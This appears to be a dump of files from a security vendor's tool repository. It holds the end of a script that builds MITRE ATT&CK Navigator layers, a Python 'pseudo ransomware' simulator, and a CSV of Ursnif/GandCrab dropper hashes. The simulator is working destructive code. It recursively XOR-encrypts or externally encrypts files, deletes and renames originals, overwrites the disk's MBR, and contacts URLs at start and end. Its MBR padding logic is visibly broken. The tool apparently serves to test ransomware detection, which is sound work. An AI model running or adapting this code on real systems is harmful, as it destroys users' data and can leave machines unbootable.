357 |                 if re.match(pattern, tag):
358 |                     # print("match")
359 |                     # if tid, this means it's attack query. Check to see if there's tid key already in dict...
360 |                     if tag in tid_dict:
361 |                         # if it exists, add as list.
362 |                         # print("exists... adding")
363 |                         tid_dict[tag].append(threat_report)
364 |                     else:
365 |                         # if key doesn't exist, create it
366 |                         # print("doesn't exist")
367 |                         tid_dict[tag] = [threat_report]
368 |                         # tid_dict[tag].append(threat_report)
369 | 
370 |     return tid_dict
371 | 
372 | 
373 | def build_navigator():
374 |     navigator = {
375 |         "name": "Cb Response Coverage (Windows,Linux,macOS)",
376 |         "version": "2.1",
377 |         "domain": "mitre-enterprise",
378 |         "description": "",
379 |         "filters": {
380 |             "stages": [
381 |                 "act"
382 |             ],
383 |             "platforms": [
384 |                 "windows",
385 |                 "mac",
386 |                 "linux"
387 |             ]
388 |         },
389 |         "sorting": 0,
390 |         "viewMode": 0,
391 |         "hideDisabled": False,
392 |         "gradient": {
393 |             "colors": [
394 |                 "#ff6666",
395 |                 "#ffe766",
396 |                 "#8ec843"
397 |             ],
398 |             "minValue": 0,
399 |             "maxValue": 100
400 |         },
401 |         "legendItems": [],
402 |         "showTacticRowBackground": False,
403 |         "tacticRowBackground": "#dddddd",
404 |         "selectTechniquesAcrossTactics": True
405 |     }
406 | 
407 |     return navigator
408 | 
409 | 
410 | def prepare_nav_techniques(tid, threat_report_values):
411 |     """should accept one tid from build_navigator()... will contain list of mutiple queries."""
412 | 
413 |     tactic = get_tactic(tid)
414 |     color = get_color(threat_report_values)
415 |     comment = get_comment(threat_report_values)
416 |     nav_technique = {
417 |         "techniqueID": tid.upper(),
418 |         "tactic": tactic,
419 |         "color": color,
420 |         "comment": comment,
421 |         "enabled": True
422 |     }
423 | 
424 |     return nav_technique
425 | 
426 | 
427 | def get_comment(threat_report_values):
428 |     number_of_reports = len(threat_report_values)
429 |     comment = "There are %s queries matching this TID.\n\n" % (int(number_of_reports))
430 |     for threat_report in threat_report_values:
431 |         comment += "Feed: %s\nTitle: %s\nID: %s\nDescription: %s\n\n" % (threat_report['feed_name'], threat_report['title'], threat_report['id'], threat_report['description'].split("\n")[0])
432 | 
433 |     return comment
434 | 
435 | 
436 | def get_color(threat_report_value):
437 |     color_dict = {
438 |         'green-high': '#00ff61',
439 |         'green-med': '#83fcb1',
440 |         'green-low': '#d6ffe5'
441 |     }
442 | 
443 |     # this if statement supports hardcoded tids via hardcoded_tids()
444 |     if type(threat_report_value) == int:
445 |         score = threat_report_value
446 |         threat_report_value = []
447 |         threat_report_value.append({'score': score})
448 | 
449 |     for threat_report in threat_report_value:
450 |         print(threat_report['score'])
451 |         if threat_report['score'] >= 80:
452 |             return color_dict['green-high']
453 |         elif threat_report['score'] >= 50:
454 |             return color_dict['green-med']
455 |         elif threat_report['score'] >= 0:
456 |             return color_dict['green-low']
457 | 
458 | def main():
459 |     api_key, url = get_auth()
460 |     print("\nYour url is: {}".format(url))
461 |     print("Your API key is: {}".format(api_key))
462 | 
463 |     # download all reports from Cb Response server as json object
464 |     data_from_cbr = download_reports(api_key, url)
465 | 
466 |     # provide stats about threat reports found.
467 |     reports_stats(data_from_cbr)
468 | 
469 |     tid_dict = generate_tid_dict(data_from_cbr)
470 | 
471 |     nav_techniques_list = []
472 |     for tid, threat_report_values in tid_dict.items():
473 |         nav_techniques = prepare_nav_techniques(tid, threat_report_values)
474 | 
475 |         # Since prepare_nav_techniques returns list with multiple tactics, we should iterate through them to create 1:1 relationships. This for loop fixes that.
476 |         for tactic in nav_techniques['tactic']:
477 |             nav_techniques_copy = dict(nav_techniques)
478 |             nav_techniques_copy['tactic'] = tactic
479 |             nav_techniques_list.append(nav_techniques_copy)
480 | 
481 |     navigator = build_navigator()
482 |     navigator['techniques'] = nav_techniques_list
483 | 
484 |     # we'll hardcode some TID's that target a fundamental feature.
485 |     # extending the existing list in case a hard coded tid has more than one tactic. This will unroll the list from hardcoded_tids()
486 |     navigator['techniques'].extend(hardcoded_tids("t1129", "Native product functionality."))
487 |     navigator['techniques'].extend(hardcoded_tids("t1116", "Native product functionality."))
488 |     navigator['techniques'].extend(hardcoded_tids("t1065", "Native product functionality."))
489 |     navigator['techniques'].extend(hardcoded_tids("t1043", "Native product functionality."))
490 | 
491 |     # builds the navigator json
492 |     navigator_json = json.dumps(navigator, indent=4, sort_keys=True)
493 | 
494 |     # save to disk in current working dir
495 |     filename = "CbResponseNavigator-" + str(int(time.time())) + ".json"
496 |     with open(filename, 'w') as outfile:
497 |         outfile.write(navigator_json)
498 |         print("\n[!] Saved MITRE Navigator json file as " + filename)
499 |         print("[!] Use this file to 'Open Existing Layer' from local file on https://mitre.github.io/attack-navigator/enterprise/")
500 | 
501 | 
502 | if __name__ == "__main__":
503 |     main()
504 | 


--------------------------------------------------------------------------------
/pseudo_ransomware/pseudo_ransomware.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | 
  3 | ###############################################################################
  4 | # 
  5 | # file:     pseudo_ransomware.py 
  6 | #
  7 | # author:   bsturk - bsturk@carbonblack.com
  8 | #
  9 | # dependencies:
 10 | #           pip install puremagic ( also installs argparse )
 11 | #           pip install requests
 12 | #           pip install pypiwin32 -or- win32api installer ( https://sourceforge.net/projects/pywin32/files/pywin32/ )
 13 | #
 14 | # created:  01/30/17
 15 | # last_mod: 07/31/18
 16 | # version:  1.10
 17 | #
 18 | # usage, etc:
 19 | # 
 20 | #   e.g. python pseudo_ransomware.py -r -p file_dir -x .crypt -N http://www.wtfismyip.com -c 1 -w 3
 21 | #
 22 | # exe generation ( not currently working ):
 23 | #
 24 | #           python setup.py py2exe
 25 | #
 26 | # arguments:
 27 | #
 28 | # TODO:
 29 | #
 30 | # history:
 31 | #
 32 | #   1.0     01/30/17 - Initial commit.
 33 | #   1.1     02/07/17 - Added flag and handling for recursing into directories, more
 34 | #                      I/O options, rename write method, rename extension arg, 
 35 | #                      use of magic/file ident option, and some small fixes/org.
 36 | #   1.2     02/10/17 - py2exe setup file, fixed -p w/ drive letters, fixed issue
 37 | #                      with default crypt method.
 38 | #   1.3     03/08/17 - network callout args added, finished up post rename option
 39 | #                      for inline modifications, added delete call for rename modify
 40 | #                      option.
 41 | #   1.4     03/09/17 - New write method for memory mapped I/O.
 42 | #   1.5     03/17/17 - New option for writing file to MBR on Windows and other platforms.  
 43 | #                      Added missing sys import.
 44 | #   1.6     03/27/17 - Added new encryption type which allows for shelling out to a command
 45 | #                      to do the encryption.  Also fixed issue with write file handle cleanup.
 46 | #   1.7     07/20/17 - Added option to do file iteration via shelling out.  Also added option
 47 | #                      to do everything via a specified command ala Patcher.
 48 | #   1.8     08/31/17 - Updated script to not limit MBR writes to 512 bytes.
 49 | #   1.9     09/13/17 - Added option to open a handle to the disk for MBR writes N times.
 50 | #   1.10    07/31/18 - Added option to alternate between 2 extensions every n files for renamed, written files.
 51 | #
 52 | ###############################################################################
 53 | 
 54 | import os
 55 | import sys
 56 | import tempfile
 57 | import errno
 58 | import mmap
 59 | import subprocess
 60 | 
 61 | import argparse
 62 | import puremagic
 63 | import requests
 64 | 
 65 | import itertools
 66 | 
 67 | if os.name == 'nt':
 68 |     import win32api, win32con, win32file
 69 | 
 70 | #############
 71 | 
 72 | VERSION                                    = 1.10
 73 | 
 74 | READ_METHOD_NONE                           = 0
 75 | READ_METHOD_NORMAL                         = 1
 76 | 
 77 | WRITE_METHOD_NONE                          = 0
 78 | WRITE_METHOD_INLINE                        = 1
 79 | WRITE_METHOD_READ_WR_RM                    = 2
 80 | WRITE_METHOD_MAPPED_WR                     = 3
 81 | 
 82 | WRITE_METHOD_MIN_VAL                       = WRITE_METHOD_NONE
 83 | WRITE_METHOD_MAX_VAL                       = WRITE_METHOD_MAPPED_WR
 84 | 
 85 | ENCRYPT_METHOD_NONE                        = 0
 86 | ENCRYPT_METHOD_XOR                         = 1
 87 | ENCRYPT_METHOD_EXTERNAL_TOOL_WITH_FILENAME = 2
 88 | 
 89 | ENCRYPT_METHOD_MIN_VAL                     = ENCRYPT_METHOD_NONE
 90 | ENCRYPT_METHOD_MAX_VAL                     = ENCRYPT_METHOD_EXTERNAL_TOOL_WITH_FILENAME
 91 | 
 92 | paths                                      = []
 93 | exts                                       = []
 94 | write_method                               = WRITE_METHOD_INLINE
 95 | read_method                                = READ_METHOD_NORMAL
 96 | encryption_method                          = ENCRYPT_METHOD_XOR
 97 | encryption_command                         = ''
 98 | iteration_command                          = ''
 99 | xor_key                                    = 42
100 | skip_hidden                                = False
101 | dir_recurse                                = False
102 | rename_extension_1                         = '.encrypted'
103 | rename_extension_2                         = '.encrypted_2'
104 | file_extension_pattern                     = None
105 | post_rename                                = False                 ## TODO: utilize this
106 | do_magic                                   = False
107 | pre_netconn                                = ''                    ## empty string sentinel to not do it
108 | post_netconn                               = ''
109 | win_write_mbr_file                         = ''
110 | num_mbr_handles                            = 1
111 | 
112 | #############
113 | 
114 | def is_hidden( _filename ):
115 | 
116 |     if os.name == 'nt':
117 |         attribute = win32api.GetFileAttributes( _filename )
118 |         return attribute & ( win32con.FILE_ATTRIBUTE_HIDDEN | win32con.FILE_ATTRIBUTE_SYSTEM )
119 | 
120 |     else:
121 |         ## macos && linux dotfiles
122 |         return os.path.basename( _filename ).startswith( '.' )
123 | 
124 | #############
125 | 
126 | def make_network_connection( _url ):
127 | 
128 |     resp = requests.get( _url )
129 |     #print resp.text
130 | 
131 | #############
132 | 
133 | def encrypt_none( _file_data ):
134 | 
135 |     return _file_data
136 | 
137 | #############
138 | 
139 | def encrypt_xor( _file_data ):
140 | 
141 |     barray = bytearray( _file_data )
142 | 
143 |     ## XOR each byte
144 | 
145 |     for i in range( len( barray ) ):
146 |         barray[i] ^= xor_key
147 | 
148 |     return barray
149 | 
150 | #############
151 | 
152 | def encrypt_with_external_command( _filename ):
153 | 
154 |     command = encryption_command
155 | 
156 |     ## subst out markers for filename and basename
157 | 
158 |     invoke = command.replace( '%F', _filename )
159 |     invoke = invoke.replace( '%f', os.path.basename( _filename ) )
160 |     invoke = invoke.replace( '%d', os.path.dirname( _filename ) )
161 | 
162 |     ## TODO: probably should use subprocess here
163 |     
164 |     #print 'Running command ' + invoke
165 | 
166 |     ret = os.system( invoke )
167 | 
168 |     if ret <> 0:
169 |         print 'encrypt_with_external_command(): Command %s failed to run: %d' % ( invoke, ret )
170 | 
171 | #############
172 | 
173 | enc_map = { ENCRYPT_METHOD_NONE : encrypt_none, ENCRYPT_METHOD_XOR : encrypt_xor, ENCRYPT_METHOD_EXTERNAL_TOOL_WITH_FILENAME : encrypt_with_external_command }
174 | 
175 | #############
176 | 
177 | def encrypt_file( _filename ):
178 | 
179 |     print 'Encrypting ' + _filename
180 | 
181 |     encrypt_func = enc_map[ encryption_method ]
182 |     rh           = None
183 |     wh           = None
184 |     size         = ()       ## default to entire file
185 | 
186 |     try:
187 | 
188 |         next_extension = next( file_extension_pattern )
189 | 
190 |         if read_method == READ_METHOD_NORMAL:       ##  gotta read to write
191 | 
192 |             if write_method == WRITE_METHOD_NONE:
193 |                 rh        = open( _filename, 'rb' )
194 | 
195 |             elif write_method == WRITE_METHOD_INLINE:
196 |                 rh        = open( _filename, 'r+' )
197 |                 wh        = rh
198 | 
199 |             elif write_method == WRITE_METHOD_READ_WR_RM:
200 |                 rh        = open( _filename, 'r' )
201 |                 fn_no_ext = os.path.splitext( _filename )[0]
202 |                 wh        = open( fn_no_ext + next_extension, 'w' )
203 | 
204 |             elif write_method == WRITE_METHOD_MAPPED_WR:
205 |                 rh        = open( _filename, 'a+b' )
206 |                 wh        = mmap.mmap( rh.fileno(), 0, access = mmap.ACCESS_WRITE )
207 |                 size      = ( os.path.getsize( _filename ), )
208 | 
209 |             contents = rh.read( *size )
210 |             enc_data = encrypt_func( contents )
211 | 
212 |         else:
213 |             encrypt_func( _filename )
214 | 
215 |         if wh is not None:
216 |             wh.seek( 0 )
217 |             wh.write( str( enc_data ) )
218 | 
219 |             if ( wh == rh ):
220 | 
221 |                 ## close just once
222 | 
223 |                 wh.close()
224 |                 rh = None
225 |                 wh = None
226 | 
227 |         if rh is not None:
228 |             rh.close()
229 | 
230 |         if wh is not None:
231 |             wh.close()
232 | 
233 |         if write_method == WRITE_METHOD_READ_WR_RM:
234 |             os.remove( _filename )
235 | 
236 |         if post_rename:
237 |             fn_no_ext = os.path.splitext( _filename )[0]
238 |             os.rename( _filename, fn_no_ext + next_extension )
239 | 
240 |     except Exception, e:
241 |         print str( e )
242 |         return False
243 | 
244 |     return True
245 | 
246 | #############
247 | 
248 | def write_mbr_winapi( _file ):
249 | 
250 |     print 'Are you SURE you want to overwrite the MBR?? This will possibly make the volume unbootable.'
251 |     response = raw_input( 'Type \"YES\" then Return to continue, anything else then Return to not continue:' )
252 | 
253 |     if response != 'YES':
254 |         return
255 | 
256 |     h       = None
257 |     handles = []
258 | 
259 |     try:
260 | 
261 |         for x in range( num_mbr_handles ):
262 | 
263 |             h = win32file.CreateFile( '\\\\.\\PhysicalDrive0',
264 |                     win32con.GENERIC_WRITE,
265 |                     win32file.FILE_SHARE_WRITE,
266 |                     None,
267 |                     win32file.OPEN_EXISTING,
268 |                     win32file.FILE_ATTRIBUTE_NORMAL,
269 |                     None )
270 | 
271 |             if ( h != win32file.INVALID_HANDLE_VALUE ):
272 |                 handles.append( h )
273 | 
274 |         f = open( _file, 'rb' )
275 | 
276 |         if f <> None:
277 | 
278 |             fsize = os.path.getsize( _file )
279 |             wsize = 512
280 | 
281 |             if fsize > 512:
282 |                 print 'WARNING: File being written is > 512 bytes, will only write 512...'
283 |                 wsize = 512
284 | 
285 |             contents = f.read( fsize )
286 | 
287 |             if fsize < 512:
288 | 
289 |                 print 'WARNING: Padding file up to 512 bytes, may not have expected results...'
290 | 
291 |                 ## pad it out to 512 bytes
292 |                 diff = 512 - 512
293 | 
294 |                 for num in xrange( diff ):
295 |                     contents += 'A'
296 | 
297 |             win32file.WriteFile( h, contents, None )
298 | 
299 |             f.close()
300 | 
301 |     except Exception, e:
302 |         print str( e )
303 |         print '\tAre you running as Administrator?'
304 | 
305 |     for handle in handles:
306 |         win32file.CloseHandle( handle )
307 | 
308 | #############
309 | 
310 | def write_mbr( _device, _file ):
311 | 
312 |     print 'Are you SURE you want to overwrite the MBR?? This will possibly make the volume unbootable.'
313 |     response = raw_input( 'Type \"YES\" then Return to continue, anything else then Return to not continue:' )
314 | 
315 |     if response != 'YES':
316 |         return
317 | 
318 |     d  = None
319 |     fd = 0
320 | 
321 |     try:
322 |         print 'Opening raw disk device...'
323 | 
324 |         d  = open( _device, 'rb+' )
325 |         fd = d.fileno()
326 | 
327 |         print 'Opened device...'
328 | 
329 |         os.lseek( fd, 0, 0 )
330 |         mbr = os.read( fd, 512 )
331 |         print mbr
332 | 
333 |         size = os.path.getsize( _file )
334 | 
335 |         if size > 512:
336 |             print 'WARNING: File being written is > 512 bytes, will only write 512...'
337 |             size = 512
338 | 
339 |         f = open( _file, 'rb' )
340 | 
341 |         if f <> None:
342 | 
343 |             print 'Opened file passed in...'
344 | 
345 |             contents    = f.read( size )
346 |             num_written = os.write( fd, contents )
347 |             f.close()
348 | 
349 |             print 'Wrote file passed in, %d bytes...' % num_written
350 | 
351 |             d.flush()
352 | 
353 |             os.lseek( fd, 0, 0 )
354 |             mbr = os.read( fd, 512 )
355 |             print mbr
356 | 
357 |         os.close( fd )
358 |         d.close()
359 | 
360 |         sys.exit( 0 )
361 | 
362 |     except Exception, e:
363 |         print 'Exception ' + str( e )
364 |         print '\tAre you running as Administrator?'
365 | 
366 | #############
367 | 
368 | def get_filenames( _path ):
369 | 
370 |     files = []
371 | 
372 |     if iteration_command:
373 | 
374 |         ## NOTE: recursion can be handled with tool - i.e. with find use -maxdepth 1 to disable recursion
375 |         ##       tool also has to present valid filenames with respect to PWD
376 | 
377 |         command = iteration_command
378 | 
379 |         ## subst out markers for path
380 | 
381 |         invoke = command.replace( '%d', _path )
382 | 
383 |         #print 'Running command ' + invoke
384 | 
385 |         lines = []
386 | 
387 |         try:
388 |             p  = subprocess.Popen( invoke, stdout = subprocess.PIPE )
389 | 
390 |         except:
391 |             print 'get_filenames(): Exception - Command %s failed to run' % ( invoke, )
392 |             return []
393 | 
394 |         for line in p.stdout.readlines():
395 |             lines.append( line )
396 | 
397 |         p.wait()
398 | 
399 |         if ( p.returncode <> 0 ):
400 |             print 'get_filenames(): Command %s failed to run: %d' % ( invoke, p.returncode )
401 | 
402 |         else:
403 |             for line in lines:
404 |                 print line
405 |                 files.append( line.rstrip() )
406 | 
407 |     else:
408 | 
409 |         if dir_recurse:
410 | 
411 |             for r, dirs, filenames in os.walk( _path ):
412 |                 for f in filenames:
413 |                     files.append( os.path.join ( r, f ) )
414 | 
415 |         else:
416 | 
417 |             tmp = os.listdir( _path )
418 | 
419 |             for f in tmp:
420 |                 fqn = os.path.join( _path, f ) 
421 |                 if not os.path.isdir( fqn ):
422 |                     files.append( fqn )
423 | 
424 |     return files
425 | 
426 | #############
427 | 
428 | def run():
429 | 
430 |     if win_write_mbr_file <> '':
431 |         write_mbr_winapi( win_write_mbr_file )
432 | 
433 |     ## TODO: other platforms need to pass in /dev/sdX (Linux) or /dev/diskX (Mac)
434 | 
435 |     if pre_netconn <> '':
436 |         make_network_connection( pre_netconn )
437 | 
438 |     for path in paths:
439 | 
440 |         print 'Iterating files in ' + path
441 | 
442 |         files = get_filenames( path )
443 | 
444 |         for f in files:
445 | 
446 |             fname, fext = os.path.splitext( f )
447 | 
448 |             if len( exts ) == 0 or fext in exts:
449 | 
450 |                 if skip_hidden and is_hidden( f ):
451 |                     print 'Skipping hidden file ' + f
452 |                     continue
453 | 
454 |                 ok = True
455 | 
456 |                 if ( do_magic ):
457 | 
458 |                     try:
459 |                         mext = puremagic.from_file( f )
460 | 
461 |                         if fext.lower() not in mext:
462 |                             print 'Improper identification - claimed ' + fext + ', ident as ' + mext + ', skipping...'
463 |                             ok = False
464 | 
465 |                     except puremagic.PureError:
466 |                         print 'Couldn\'t identify file, encrypting anyway...'
467 |                         ok = True
468 | 
469 |                 if ok:
470 |                     success = encrypt_file( f )
471 | 
472 |     if post_netconn <> '':
473 |         make_network_connection( post_netconn )
474 | 
475 | #############
476 | 
477 | def encryption_method_type( _val ):
478 | 
479 |     try:
480 |         _val = int( _val )
481 | 
482 |         if _val < ENCRYPT_METHOD_MIN_VAL or _val > ENCRYPT_METHOD_MAX_VAL:
483 |             raise argparse.ArgumentTypeError( 'encrypt method must be between %d and %d' % ( ENCRYPT_METHOD_MIN_VAL, ENCRYPT_METHOD_MAX_VAL ) )
484 | 
485 |     except:
486 |         raise argparse.ArgumentTypeError( 'invalid encrypt method arg' )
487 | 
488 |     return _val
489 | 
490 | #############
491 | 
492 | def print_enc_method( _info, _method ):
493 | 
494 |     print '===== Using encryption method ====='
495 | 
496 |     txt  = '<UNKNOWN>'
497 |     post = ' [' + _info + ']'
498 | 
499 |     if _method == ENCRYPT_METHOD_NONE:
500 |         txt = 'none'
501 | 
502 |     if _method == ENCRYPT_METHOD_XOR:
503 |         txt = 'xor'
504 | 
505 |     if _method == ENCRYPT_METHOD_EXTERNAL_TOOL_WITH_FILENAME:
506 |         txt = 'external command ' + encryption_command
507 | 
508 |     print '\t' + txt + post
509 |     print
510 | 
511 | #############
512 | 
513 | def write_method_type( _val ):
514 | 
515 |     try:
516 |         _val = int( _val )
517 | 
518 |         if _val < WRITE_METHOD_MIN_VAL or _val > WRITE_METHOD_MAX_VAL:
519 |             raise argparse.ArgumentTypeError( 'write method must be between %d and %d' % ( WRITE_METHOD_MIN_VAL, WRITE_METHOD_MAX_VAL ) )
520 | 
521 |     except:
522 |         raise argparse.ArgumentTypeError( 'invalid write method arg' )
523 | 
524 |     return _val
525 | 
526 | #############
527 | 
528 | def print_write_method( _info, _method ):
529 | 
530 |     print '===== Using write method ====='
531 | 
532 |     txt  = '<UNKNOWN>'
533 |     post = ' [' + _info + ']'
534 | 
535 |     if _method == WRITE_METHOD_NONE:
536 |         txt = 'no writing'
537 | 
538 |     if _method == WRITE_METHOD_INLINE:
539 |         txt = 'inline'
540 | 
541 |     elif _method == WRITE_METHOD_READ_WR_RM:
542 |         txt = 'read/write/rm'
543 | 
544 |     elif _method == WRITE_METHOD_MAPPED_WR:
545 |         txt = 'memory mapped I/O'
546 | 
547 |     print '\t' + txt + post
548 |     print
549 | 
550 | #############
551 | 
552 | def handle_args():
553 | 
554 |     global paths
555 |     global exts
556 |     global read_method
557 |     global write_method
558 |     global encryption_method
559 |     global encryption_command
560 |     global iteration_command
561 |     global skip_hidden
562 |     global dir_recurse
563 |     global rename_extension_1
564 |     global rename_extension_2
565 |     global file_extension_pattern
566 |     global post_rename
567 |     global do_magic
568 |     global pre_netconn
569 |     global post_netconn
570 |     global win_write_mbr_file
571 |     global num_mbr_handles
572 |     
573 |     parser = argparse.ArgumentParser()
574 | 
575 |     parser.add_argument( '-p', '--paths', help = 'comma separated list of paths to iterate over' )
576 |     parser.add_argument( '-e', '--extensions', help = 'comma separated list of extensions to encrypt - default all extensions are encrypted' )
577 |     parser.add_argument( '-w', '--writemethod', type = write_method_type, help = 'write method: 0 - none; 1 - write in place; 2 - read, write new, rm orig; 3 memory mapped I/O; default = 1' )
578 |     parser.add_argument( '-c', '--encmethod', type = encryption_method_type, help = 'encryption method: 0 - none; 1 - xor; 2 - external command; default = 1' )
579 |     parser.add_argument( '-C', '--enccmd', help = 'encryption command invocation, specify marker for basename with %f, dir with %d, and filename and extension with %F: i.e. zip %d\%f.encrypt %d\%F' )
580 |     parser.add_argument( '-I', '--itercmd', help = 'file iteration command invocation, specify marker for dir with %d, i.e. find -type f %d or dir /s *txt*' )
581 |     parser.add_argument( '-H', '--skiphidden', help = 'skip hidden files', action = 'store_true' )
582 |     parser.add_argument( '-r', '--recurse', help = 'recurse into directories', action = 'store_true' )
583 |     parser.add_argument( '-x', '--renameext1', help = 'first extension to use for renamed written file' )
584 |     parser.add_argument( '-X', '--renameext2', help = 'second extension to use for renamed written file' )
585 |     parser.add_argument( '-a', '--alternate', help = 'change how many time a file extension is repeated before alternating' )
586 |     parser.add_argument( '-P', '--postrename', help = 'when modifying original file inline, rename when finished', action = 'store_true' )
587 |     parser.add_argument( '-m', '--domagic', help = 'do file type validation before encrypting', action = 'store_true' )
588 |     parser.add_argument( '-n', '--prenetconn', help = 'url to hit at start of process' )
589 |     parser.add_argument( '-N', '--postnetconn', help = 'url to hit at end of process' )
590 |     parser.add_argument( '-b', '--winwritembr', help = 'will write contents of file argument to the MBR on Windows' )
591 |     parser.add_argument( '-d', '--numhandlembr', help = 'number of times to open a handle to the disk for MBR writes - default = 1' )
592 | 
593 |     args = parser.parse_args()
594 | 
595 |     if args.paths is None:
596 |         print 'No paths to walk...'
597 |         paths = []
598 |         
599 |     else:
600 |         paths = args.paths.split( ',' )
601 | 
602 |     print '===== encrypting files in ====='
603 | 
604 |     for path in paths:
605 |         print '\t' + path
606 |         
607 |     print
608 | 
609 |     if args.extensions is not None:
610 | 
611 |         print args.extensions
612 | 
613 |         exts = args.extensions.split( ',' )
614 | 
615 |         print '===== with extensions ====='
616 | 
617 |         for ext in exts:
618 |             print '\t' + ext
619 |         
620 |         print
621 | 
622 |     if args.skiphidden is not None:
623 |         skip_hidden = args.skiphidden
624 | 
625 |     if skip_hidden:
626 |         print '===== skipping hidden files ====='
627 | 
628 |     else:
629 |         print '===== including hidden files ====='
630 | 
631 |     print
632 | 
633 |     if args.recurse is not None:
634 |         dir_recurse = args.recurse
635 | 
636 |     if dir_recurse:
637 |         print '===== recursing into specified directories ====='
638 | 
639 |     else:
640 |         print '===== NOT recursing into specified directories ====='
641 | 
642 |     print
643 | 
644 |     if args.writemethod is not None:
645 |         write_method = args.writemethod
646 |         print_write_method( 'override', write_method )
647 | 
648 |     else:
649 |         print_write_method( 'default', write_method )
650 | 
651 |     if args.enccmd is not None:
652 |         read_method        = READ_METHOD_NONE
653 |         encryption_command = args.enccmd
654 |         print '===== encrypting using command %s =====' % ( encryption_command, )
655 | 
656 |     if args.encmethod is not None:
657 |         encryption_method = args.encmethod
658 |         print_enc_method( 'override', encryption_method )
659 | 
660 |     else:
661 |         print_enc_method( 'default', encryption_method )
662 | 
663 |     if args.itercmd is not None:
664 |         iteration_command = args.itercmd
665 |         print '===== iterating using command %s =====' % ( iteration_command, )
666 | 
667 |     if args.renameext1 is not None:
668 |         rename_extension_1 = args.renameext1
669 |         print '===== rename extension is %s =====' % ( rename_extension_1 )
670 | 
671 |     if args.renameext2 is not None:
672 |         rename_extension_2 = args.renameext2
673 |         print '===== rename extension 2 is %s =====' % ( rename_extension_2 )
674 | 
675 |     if args.postrename is not None and args.postrename:
676 |         post_rename = args.postrename
677 |         print '===== renaming modified file inline ====='
678 | 
679 |     if args.domagic is not None and args.domagic:
680 |         do_magic = args.domagic
681 |         print '===== verifing file contents (via libmagic) against extension ====='
682 | 
683 |     if args.prenetconn is not None:
684 |         pre_netconn = args.prenetconn
685 |         print '===== will connect to at %s start =====' % ( pre_netconn )
686 | 
687 |     if args.postnetconn is not None:
688 |         post_netconn = args.postnetconn
689 |         print '===== will connect to at %s end =====' % ( post_netconn )
690 | 
691 |     if args.winwritembr is not None:
692 |         win_write_mbr_file = args.winwritembr
693 |         print '===== Will write contents of %s to MBR on \\\\.\\PhysicalDrive0 =====' % ( win_write_mbr_file )
694 | 
695 |     if args.alternate is not None:
696 | 
697 |         assert( rename_extension_2 is not None )
698 | 
699 |         num_alternate = args.alternate
700 |         print 'Extensions will alternate every ' + num_alternate + ' lines between ' + rename_extension_1 + ' and ' + rename_extension_2
701 | 
702 |         # initialize pattern if alternate is specified
703 | 
704 |         file_extension_pattern = itertools.cycle( int( num_alternate ) * [ str( rename_extension_1 ) ] + int( num_alternate ) * [ str( rename_extension_2 ) ] )
705 | 
706 |     else:
707 |         # just use the first extension
708 | 
709 |         file_extension_pattern = itertools.cycle( [ rename_extension_1 ] )
710 | 
711 |     if args.numhandlembr is not None:
712 |         num_mbr_handles = int( args.numhandlembr )
713 |         print '===== will open a handle to the disk for MBR writes ' + str( num_mbr_handles ) + ' times ====='
714 | 
715 | #############
716 | 
717 | if __name__ == '__main__':
718 | 
719 |     handle_args()
720 | 
721 |     run()
722 | 


--------------------------------------------------------------------------------
/threat_hunting/IOCs/IOCs_2019_Q1_Ursnif-GandCrab.csv:
--------------------------------------------------------------------------------
  1 | Description,SHA256,MD5
  2 | Word Dropper Variant,cc5a14ff026ee593d7d25f213715b73833e6b9cf71091317121a009d5ad7fc36,7ce3d9fc86396fac9865607594395e94
  3 | Word Dropper Variant,28a8d6b8a0cdcb25d098e403cc8b6dcb855cb591f0b54c2e3363b5c580d92b28,74c7aed44680100e984251ce2cdbdbc6
  4 | Word Dropper Variant,facbc2cb089668197ca3968a3433b6f4826430c13f7d1c75b44667307c67dfe3,10f308d78adda567d4589803ce18cc9b
  5 | Word Dropper Variant,e714a5147335245c386b105bb7494a8b190b6a737ba28f029561efe48105cd11,f279d0f04874327b85221697d99de321
  6 | Word Dropper Variant,56c46ef3d5bd544fa35f6e336d3be93cf36e72d0273fa1dbc915979f2d883e9d,bc1b322e7efc19417ab0d0524ccb9ff2
  7 | Word Dropper Variant,8f6573c58eeecb8cc417a20ee9eb7fabcf55ef4dd96c5220c87806153d016619,3dd17c1ad4731b01cdab9be2af42e254
  8 | Word Dropper Variant,66652210842d53275136893c19ff51978902057d9f67b933132adc95949338c9,da118ab0b2c2c52fd351a28c3a131c48
  9 | Word Dropper Variant,f15bfeadc99aa64b1cb9b643433e60f588244d610c64c74288dc2200f8df6ee7,63bc0a58207c5a6ba48828b02723a644
 10 | Word Dropper Variant,e0792d8fb12be3d9b100a8997b20d00584643ef3330146e4f00759688780b72e,edd5aa6e4c8719634d849c38f83b4696
 11 | Word Dropper Variant,9e4c0405675c0eb632b5c47f1db2b28fe42b68e667c880eaaf56f57976c635fb,e60580f22c925f6cca5ce48278ec0291
 12 | Word Dropper Variant,ce9c72b3348f4f9287dfe6f6a8388c913a503b28129aafdb753cbca27d740c46,97de3aba94557c101b28893e099482b3
 13 | Word Dropper Variant,28ae60da78e097de193c71b1bba5bb4bde75dd9c8c357976c6a44bce1d2d3799,622cf6824c9c5309c3155fbfb4eef36e
 14 | Word Dropper Variant,5172985158410e4888058ce991680f8281489606fbd6eda31e5ca51bd058a69d,3e10524001a0cd27ac142704627a1c08
 15 | Word Dropper Variant,0a178c213499d3b6256546f515b548017eab52b8df72d0933fa18b42e2b99cb3,92fbb355e563d6d2ef946dd177c8d567
 16 | Word Dropper Variant,c8b8c3242aa6a558ee1237ab50861d63372ddcc910721925094d4a2bd908bc12,9188de690a576bbb541f76e696bea820
 17 | Word Dropper Variant,aa2d5568001c555715e7265018b921fed881f1ff1fb5d90ee4409e59971f9c8d,c4d95ebcd3d00a51662e363ec49ce119
 18 | Word Dropper Variant,86b3e9b065f67c0e492ee18dfd4088ea681b071f7c7d19de12759cd01798d1b3,5f3f780be43d5a303abfe7781779c444
 19 | Word Dropper Variant,51efeb613b31aa4523a3cd4e3a1f2dc78deaa8f6259cb69e80307f19825d4b7b,7379c87dc0eafc1765ff029735d957e3
 20 | Word Dropper Variant,9734ee8d9a23f0385ec99fd5f9a91b01916a4a4604fc23103cb376375c893e1b,4d57ad15eecc9a2c329bb85b11b60224
 21 | Word Dropper Variant,a611ccc5c964cbf6a9347c1e8ed3e4fcd5845ab70b61e888144c31a599c507ce,700216fad78de4e57ed98e52003cf083
 22 | Word Dropper Variant,85d9b957f2892a9b2a9e3bff922857fabcd8f7cc0471871af42d0299e5fcd1b4,ebdf5d677cbaa05b607105e590ba1aba
